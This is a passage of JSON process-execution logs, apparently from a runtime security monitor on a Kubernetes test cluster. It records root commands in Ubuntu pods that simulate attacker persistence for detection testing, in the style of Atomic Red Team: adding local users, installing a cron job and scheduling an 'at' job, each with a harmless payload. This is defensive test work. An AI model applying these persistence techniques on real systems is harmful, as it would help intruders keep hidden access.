inInitTree","start_time":"2025-09-17T18:20:11.263423935Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":1,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0Nzg0MjY2OTY4OjExMjU0MjE=","tid":1125421,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0Nzg0MjY2OTY4OjExMjU0MjE=","pid":1125421,"uid":0,"cwd":"/","binary":"/usr/bin/bash","arguments":"-lc \"useradd -m -s /bin/bash demo_user && adduser --disabled-password --gecos \"\" demo_user2\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-17T18:20:11.217484691Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":1,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjEwODAxNjQ3OjExMjUzNDI=","tid":1125421,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjEwODAxNjQ3OjExMjUzNDI=","pid":1125342,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-17T18:20:11.044018690Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjAyNzU2OTMxOjExMjUzMzM=","tid":1125342,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjAyNzU2OTMxOjExMjUzMzM=","pid":1125333,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c start","flags":"execve clone","start_time":"2025-09-17T18:20:11.035974122Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":1125333,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-17T18:20:11.263423270Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDM3MTg3ODE3NzU1ODcyOjExNDI3NDU=","pid":1142745,"uid":0,"cwd":"/","binary":"/usr/bin/crontab","arguments":"-l","flags":"execve rootcwd inInitTree","start_time":"2025-09-17T19:13:34.250973054Z","auid":4294967295,"pod":{"namespace":"default","name":"crontab-list","container":{"id":"containerd://1396c5f20caaabe64f7dca67dfc0cf2387f0e2475e3c21a4e86e839c0a1f9e50","name":"crontab-list","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"start_time":"2025-09-17T19:13:19Z","pid":1,"security_context":{}},"pod_labels":{"run":"crontab-list"},"workload":"crontab-list","workload_kind":"Pod"},"docker":"1396c5f20caaabe64f7dca67dfc0cf2","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDM3MTcyOTg2MjU0Nzk1OjExNDI3NDU=","tid":1142745,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDM3MTcyOTg2MjU0Nzk1OjExNDI3NDU=","pid":1142745,"uid":0,"cwd":"/","binary":"/usr/bin/bash","arguments":"-lc \"\napt-get update -qq && apt-get install -y -qq cron &&\necho \"* * * * * date\" | crontab - &&\ncrontab -l\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-17T19:13:19.419472806Z","auid":4294967295,"pod":{"namespace":"default","name":"crontab-list","container":{"id":"containerd://1396c5f20caaabe64f7dca67dfc0cf2387f0e2475e3c21a4e86e839c0a1f9e50","name":"crontab-list","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"start_time":"2025-09-17T19:13:19Z","pid":1,"security_context":{}},"pod_labels":{"run":"crontab-list"},"workload":"crontab-list","workload_kind":"Pod"},"docker":"1396c5f20caaabe64f7dca67dfc0cf2","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDM3MTcyNzY5ODY3MDE5OjExNDI2ODg=","tid":1142745,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDM3MTcyNzY5ODY3MDE5OjExNDI2ODg=","pid":1142688,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/aed144e089149f7e4f9d41bca4116fbfdaad1dcd214217ab3afdb5c8cc0e096d","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id aed144e089149f7e4f9d41bca4116fbfdaad1dcd214217ab3afdb5c8cc0e096d -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-17T19:13:19.203084414Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDM3MTcyNzYxNjQzNjk3OjExNDI2ODA=","tid":1142688,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDM3MTcyNzYxNjQzNjk3OjExNDI2ODA=","pid":1142680,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/aed144e089149f7e4f9d41bca4116fbfdaad1dcd214217ab3afdb5c8cc0e096d","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id aed144e089149f7e4f9d41bca4116fbfdaad1dcd214217ab3afdb5c8cc0e096d start","flags":"execve clone","start_time":"2025-09-17T19:13:19.194860871Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":1142680,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-17T19:13:34.250972906Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDM3MTg3ODE0MjA3MTA0OjExNDMwODI=","pid":1143082,"uid":0,"cwd":"/","binary":"/usr/bin/crontab","arguments":"-","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-17T19:13:34.247424310Z","auid":4294967295,"pod":{"namespace":"default","name":"crontab-list","container":{"id":"containerd://1396c5f20caaabe64f7dca67dfc0cf2387f0e2475e3c21a4e86e839c0a1f9e50","name":"crontab-list","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"start_time":"2025-09-17T19:13:19Z","pid":259,"security_context":{}},"pod_labels":{"run":"crontab-list"},"workload":"crontab-list","workload_kind":"Pod"},"docker":"1396c5f20caaabe64f7dca67dfc0cf2","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDM3MTcyOTg2MjU0Nzk1OjExNDI3NDU=","tid":1143082,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDM3MTcyOTg2MjU0Nzk1OjExNDI3NDU=","pid":1142745,"uid":0,"cwd":"/","binary":"/usr/bin/bash","arguments":"-lc \"\napt-get update -qq && apt-get install -y -qq cron &&\necho \"* * * * * date\" | crontab - &&\ncrontab -l\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-17T19:13:19.419472806Z","auid":4294967295,"pod":{"namespace":"default","name":"crontab-list","container":{"id":"containerd://1396c5f20caaabe64f7dca67dfc0cf2387f0e2475e3c21a4e86e839c0a1f9e50","name":"crontab-list","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"start_time":"2025-09-17T19:13:19Z","pid":1,"security_context":{}},"pod_labels":{"run":"crontab-list"},"workload":"crontab-list","workload_kind":"Pod"},"docker":"1396c5f20caaabe64f7dca67dfc0cf2","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDM3MTcyNzY5ODY3MDE5OjExNDI2ODg=","tid":1142745,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDM3MTcyNzY5ODY3MDE5OjExNDI2ODg=","pid":1142688,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/aed144e089149f7e4f9d41bca4116fbfdaad1dcd214217ab3afdb5c8cc0e096d","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id aed144e089149f7e4f9d41bca4116fbfdaad1dcd214217ab3afdb5c8cc0e096d -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-17T19:13:19.203084414Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDM3MTcyNzYxNjQzNjk3OjExNDI2ODA=","tid":1142688,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDM3MTcyNzYxNjQzNjk3OjExNDI2ODA=","pid":1142680,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/aed144e089149f7e4f9d41bca4116fbfdaad1dcd214217ab3afdb5c8cc0e096d","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id aed144e089149f7e4f9d41bca4116fbfdaad1dcd214217ab3afdb5c8cc0e096d start","flags":"execve clone","start_time":"2025-09-17T19:13:19.194860871Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":1142680,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-17T19:13:34.247424081Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDc5OTY2MDMyODgzOjI1NTgxMzE=","pid":2558131,"uid":1,"cwd":"/","binary":"/usr/bin/at","arguments":"-l","flags":"execve rootcwd inInitTree","start_time":"2025-09-29T23:31:46.399250606Z","auid":4294967295,"pod":{"namespace":"default","name":"atomic-at-schedule","container":{"id":"containerd://5df343224db6773075e3837310923ec3e37c25845baa339468bf60a076e7c58c","name":"atomic-at-schedule","image":{"id":"docker.io/library/ubuntu@sha256:353675e2a41babd526e2b837d7ec780c2a05bca0164f7ea5dbbd433d21d166fc","name":"docker.io/library/ubuntu:latest"},"start_time":"2025-09-29T23:31:36Z","pid":1,"security_context":{}},"pod_labels":{"run":"atomic-at-schedule"},"workload":"atomic-at-schedule","workload_kind":"Pod"},"docker":"5df343224db6773075e3837310923ec","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDcwMjY0ODUzNTY2OjI1NTgxMzE=","tid":2558131,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDcwMjY0ODUzNTY2OjI1NTgxMzE=","pid":2558131,"uid":0,"cwd":"/","binary":"/usr/bin/bash","arguments":"-lc \"apt-get update -y >/dev/null 2>&1 && apt-get install -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo 'echo Hello from Atomic Red Team' | at now + 1 minute && at -l\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-29T23:31:36.698070806Z","auid":4294967295,"pod":{"namespace":"default","name":"atomic-at-schedule","container":{"id":"containerd://5df343224db6773075e3837310923ec3e37c25845baa339468bf60a076e7c58c","name":"atomic-at-schedule","image":{"id":"docker.io/library/ubuntu@sha256:353675e2a41babd526e2b837d7ec780c2a05bca0164f7ea5dbbd433d21d166fc","name":"docker.io/library/ubuntu:latest"},"start_time":"2025-09-29T23:31:36Z","pid":1,"security_context":{}},"pod_labels":{"run":"atomic-at-schedule"},"workload":"atomic-at-schedule","workload_kind":"Pod"},"docker":"5df343224db6773075e3837310923ec","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDY2MzAwODE3NDgzOjI1NTgwNjQ=","tid":2558131,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDY2MzAwODE3NDgzOjI1NTgwNjQ=","pid":2558064,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/550ad09f73241500828700c8d0d771016ae22e8012f9c6287db21ac403eb978c","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 550ad09f73241500828700c8d0d771016ae22e8012f9c6287db21ac403eb978c -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-29T23:31:32.734034648Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDY2MjkzMzc4NTcxOjI1NTgwNTY=","tid":2558064,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDY2MjkzMzc4NTcxOjI1NTgwNTY=","pid":2558056,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/550ad09f73241500828700c8d0d771016ae22e8012f9c6287db21ac403eb978c","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 550ad09f73241500828700c8d0d771016ae22e8012f9c6287db21ac403eb978c start","flags":"execve clone","start_time":"2025-09-29T23:31:32.726595737Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":2558056,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-29T23:31:46.399250303Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDc5OTYxNzMxMDQxOjI1NTgzNjY=","pid":2558366,"uid":1,"cwd":"/","binary":"/usr/bin/at","arguments":"now + 1 minute","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-29T23:31:46.394948248Z","auid":4294967295,"pod":{"namespace":"default","name":"atomic-at-schedule","container":{"id":"containerd://5df343224db6773075e3837310923ec3e37c25845baa339468bf60a076e7c58c","name":"atomic-at-schedule","image":{"id":"docker.io/library/ubuntu@sha256:353675e2a41babd526e2b837d7ec780c2a05bca0164f7ea5dbbd433d21d166fc","name":"docker.io/library/ubuntu:latest"},"start_time":"2025-09-29T23:31:36Z","pid":178,"security_context":{}},"pod_labels":{"run":"atomic-at-schedule"},"workload":"atomic-at-schedule","workload_kind":"Pod"},"docker":"5df343224db6773075e3837310923ec","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDcwMjY0ODUzNTY2OjI1NTgxMzE=","tid":2558366,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDcwMjY0ODUzNTY2OjI1NTgxMzE=","pid":2558131,"uid":0,"cwd":"/","binary":"/usr/bin/bash","arguments":"-lc \"apt-get update -y >/dev/null 2>&1 && apt-get install -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo 'echo Hello from Atomic Red Team' | at now + 1 minute && at -l\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-29T23:31:36.698070806Z","auid":4294967295,"pod":{"namespace":"default","name":"atomic-at-schedule","container":{"id":"containerd://5df343224db6773075e3837310923ec3e37c25845baa339468bf60a076e7c58c","name":"atomic-at-schedule","image":{"id":"docker.io/library/ubuntu@sha256:353675e2a41babd526e2b837d7ec780c2a05bca0164f7ea5dbbd433d21d166fc","name":"docker.io/library/ubuntu:latest"},"start_time":"2025-09-29T23:31:36Z","pid":1,"security_context":{}},"pod_labels":{"run":"atomic-at-schedule"},"workload":"atomic-at-schedule","workload_kind":"Pod"},"docker":"5df343224db6773075e3837310923ec","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDY2MzAwODE3NDgzOjI1NTgwNjQ=","tid":2558131,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDY2MzAwODE3NDgzOjI1NTgwNjQ=","pid":2558064,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/550ad09f73241500828700c8d0d771016ae22e8012f9c6287db21ac403eb978c","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 550ad09f73241500828700c8d0d771016ae22e8012f9c6287db21ac403eb978c -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-29T23:31:32.734034648Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDY2MjkzMzc4NTcxOjI1NTgwNTY=","tid":2558064,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoyMDg5NDY2MjkzMzc4NTcxOjI1NTgwNTY=","pid":2558056,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/550ad09f73241500828700c8d0d771016ae22e8012f9c6287db21ac403eb978c","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 550ad09f73241500828700c8d0d771016ae22e8012f9c6287db21ac403eb978c start","flags":"execve 